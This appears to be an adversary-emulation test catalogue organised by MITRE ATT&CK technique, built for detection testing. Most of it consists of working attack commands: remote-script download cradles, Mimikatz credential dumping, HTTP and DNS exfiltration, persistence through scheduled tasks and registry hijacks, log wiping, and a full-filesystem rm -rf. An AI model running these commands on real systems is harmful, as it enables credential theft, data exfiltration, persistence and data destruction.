([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()

powershellwindowsGet-DomainController with PowerView

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose

powershellwindowsGet-WmiObject to Enumerate Domain Controllers

try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }

command_promptwindowsRemote System Discovery - net group Domain Controller

net group /domain "Domain controllers"

powershellwindowsEnumerate Remote Hosts with Netscan

cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'

T1027 Obfuscated Files or Information · 11 tests

shmacos, linuxDecode base64 Data into Script

if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh

powershellwindowsExecute base64-encoded PowerShell

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand

powershellwindowsExecute base64-encoded PowerShell from Windows Registry

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"

command_promptwindowsExecution from Compressed File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over email

Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over HTTP

Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"

powershellwindowsObfuscated Command in PowerShell

$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

manualwindowsObfuscated Command Line using special Unicode characters

powershellelevatedwindowsSnake Malware Encrypted crmlog file

$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"

command_promptwindowsExecution from Compressed JScript File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"

powershellwindowsObfuscated PowerShell Command via Character Array

$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)

T1027.002 Software Packing · 4 tests

shlinuxBinary simply packed by UPX (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shlinuxBinary packed by UPX, with modified headers (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary simply packed by UPX

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary packed by UPX, with modified headers

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

T1027.013 Encrypted/Encoded File · 3 tests

powershellwindows, macos, linuxDecode Eicar File and Write to File

$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt

powershellwindows, macos, linuxDecrypt Eicar File and Write to File

$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt

bashlinux, macosPassword-Protected ZIP Payload Extraction and Execution

echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh

T1033 System Owner/User Discovery · 7 tests

command_promptwindowsSystem Owner/User Discovery

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt

shlinux, macosSystem Owner/User Discovery

users
w
who

powershellwindowsFind computers where user has session - Stealth mode (PowerView)

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose

powershellwindowsUser Discovery With Env Vars PowerShell Script

[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append

powershellwindowsGetCurrent User with PowerShell Script

[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt

powershellwindowsSystem Discovery - SocGholish whoami

$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file

command_promptwindowsSystem Owner/User Discovery Using Command Prompt

set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%

T1036 Masquerading · 2 tests

powershellwindowsSystem File Copied to Unusual Location

copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5 
stop-process -name "cmd" | out-null

powershellwindowsMalware Masquerading and Execution from Zip File

Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null

T1036.004 Masquerade Task or Service · 4 tests

command_promptelevatedwindowsCreating W32Time similar named service using schtasks

schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
schtasks /query /tn win32times

command_promptelevatedwindowsCreating W32Time similar named service using sc

sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
sc qc win32times

shlinuxlinux rename /proc/pid/comm using prctl

#{exe_path} & ps
TMP=`ps | grep totally_legit`
if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && exit 1; fi
exit 0

shelevatedlinuxHiding a malicious process with bind mounts

eval '(while true; do :; done) &'
echo $! > /tmp/evil_pid.txt
random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)

T1036.005 Match Legitimate Resource Name or Location · 3 tests

shmacos, linuxExecute a process from a directory masquerading as the current parent directory

mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"

powershellwindowsMasquerade as a built-in system executable

Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"

powershellelevatedwindowsMasquerading cmd.exe as VEDetector.exe

# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"

Start-Sleep -Seconds 5

T1039 Data from Network Shared Drive · 2 tests

command_promptelevatedwindowsCopy a sensitive File over Administrative share with copy

copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}

powershellelevatedwindowsCopy a sensitive File over Administrative share with Powershell

copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"

T1041 Exfiltration Over C2 Channel · 2 tests

powershellwindowsC2 Data Exfiltration

if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive

powershellwindowsText Based Data Exfiltration using DNS subdomains

$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}

T1053.005 Scheduled Task · 12 tests

command_promptelevatedwindowsScheduled Task Startup Script

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

command_promptwindowsScheduled task Local

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}

command_promptelevatedwindowsScheduled task Remote

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

powershellwindowsPowershell Cmdlet Scheduled Task

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

powershellwindowsTask Scheduler via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"

powershellelevatedwindowsWMI Invoke-CimMethod Scheduled Task

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

command_promptwindowsScheduled Task Executing Base64 Encoded Commands From Registry

reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}

powershellelevatedwindowsImport XML Schedule Task with Hidden Attribute

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

powershellwindowsPowerShell Modify A Scheduled Task

$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction

command_promptelevatedwindowsScheduled Task ("Ghost Task") via Registry Key Manipulation

"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon

command_promptelevatedwindowsScheduled Task Persistence via CompMgmt.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc

command_promptelevatedwindowsScheduled Task Persistence via Eventviewer.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"

T1057 Process Discovery · 9 tests

shlinux, macosProcess Discovery - ps

ps >> #{output_file}
ps aux >> #{output_file}

command_promptwindowsProcess Discovery - tasklist

tasklist

powershellwindowsProcess Discovery - Get-Process

Get-Process

powershellwindowsProcess Discovery - get-wmiObject

get-wmiObject -class Win32_Process

command_promptwindowsProcess Discovery - wmic process

wmic process get /format:list

command_promptwindowsDiscover Specific Process - tasklist

tasklist | findstr #{process_to_enumerate}

powershellelevatedwindowsProcess Discovery - Process Hacker

Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"

powershellelevatedwindowsProcess Discovery - PC Hunter

Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"

command_promptwindowsLaunch Taskmgr from cmd to View running processes

taskmgr.exe /7

T1059 Command and Scripting Interpreter · 1 test

powershellwindowsAutoIt Script Execution

Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"

T1059.001 PowerShell · 22 tests

command_promptelevatedwindowsMimikatz

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

powershellwindowsRun BloodHound from local disk

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

powershellwindowsRun Bloodhound from Memory using Download Cradle

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

powershellelevatedwindowsMimikatz - Cradlecraft PsSendKeys

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

command_promptwindowsInvoke-AppPathBypass

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

command_promptwindowsPowershell MsXml COM object - with prompt

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

command_promptwindowsPowershell XML requests

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"

command_promptwindowsPowershell invoke mshta.exe download

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"

manualwindowsPowershell Invoke-DownloadCradle

powershellwindowsPowerShell Fileless Script Execution

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

powershellwindowsNTFS Alternate Data Stream Access

Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand

powershellelevatedwindowsPowerShell Session Creation and Use

New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

command_promptwindowsPowerShell Command Execution

powershell.exe -e  #{obfuscated_code}

powershellelevatedwindowsPowerShell Invoke Known Malicious Cmdlets

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

powershellwindowsPowerUp Invoke-AllChecks

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks

powershellwindowsAbuse Nslookup with DNS Records

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

powershellwindowsSOAPHound - Dump BloodHound Data

#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}

powershellwindowsSOAPHound - Build Cache

#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}

T1059.003 Windows Command Shell · 6 tests

powershellwindowsCreate and Execute Batch Script

Start-Process "#{script_path}"

command_promptwindowsWrites text to a file and displays it.

echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"

command_promptwindowsSuspicious Execution via Windows Command Shell

%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}

powershellwindowsSimulate BlackByte Ransomware Print Bombing

cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null

command_promptwindowsCommand Prompt read contents from CMD file and execute

cmd /r cmd<"#{input_file}"

command_promptelevatedwindowsCommand prompt writing script to file then executes it

 c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs

T1059.005 Visual Basic · 3 tests

powershellwindowsVisual Basic script execution to gather local computer information

cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt

powershellwindowsEncoded VBS code execution

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"

powershellwindowsExtract Memory via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"

T1059.007 JavaScript · 2 tests

command_promptwindowsJScript execution to gather local computer information via cscript

cscript "#{jscript}" > %tmp%\T1059.007.out.txt

command_promptwindowsJScript execution to gather local computer information via wscript

wscript "#{jscript}"

T1070 Indicator Removal · 2 tests

command_promptelevatedwindowsIndicator Removal using FSUtil

fsutil usn deletejournal /D C:

powershellwindowsIndicator Manipulation using FSUtil

if (-not (Test-Path "#{file_to_manipulate}")) { New-Item "#{file_to_manipulate}" -Force } 
echo "1234567890" > "#{file_to_manipulate}"
fsutil  file setZeroData offset=0 length=#{file_data_length} "#{file_to_manipulate}"

T1070.004 File Deletion · 11 tests

shlinux, macosDelete a single file - FreeBSD/Linux/macOS

rm -f #{file_to_delete}

shlinux, macosDelete an entire folder - FreeBSD/Linux/macOS

rm -rf #{folder_to_delete}

shlinuxOverwrite and delete a file with shred

shred -u #{file_to_shred}

command_promptwindowsDelete a single file - Windows cmd

del /f #{file_to_delete}

command_promptwindowsDelete an entire folder - Windows cmd

rmdir /s /q #{folder_to_delete}

powershellwindowsDelete a single file - Windows PowerShell

Remove-Item -path #{file_to_delete}

powershellwindowsDelete an entire folder - Windows PowerShell

Remove-Item -Path #{folder_to_delete} -Recurse

shlinuxDelete Filesystem - Linux

[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null

powershellelevatedwindowsDelete Prefetch File

Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])

powershellwindowsDelete TeamViewer Log Files

New-Item -Path #{teamviewer_log_file} -Force | Out-Null
Remove-Item #{teamviewer_log_file} -Force -ErrorAction Ignore

command_promptelevatedwindowsClears Recycle bin via rd

rd /s /q %systemdrive%\$RECYCLE.BIN

T1071 Application Layer Protocol · 1 test

powershellwindowsTelnet C2

#{client_path} #{server_ip} --port #{server_port}

T1071.001 Web Protocols · 3 tests

powershellwindowsMalicious User Agents - Powershell

Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null

command_promptwindowsMalicious User Agents - CMD

#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
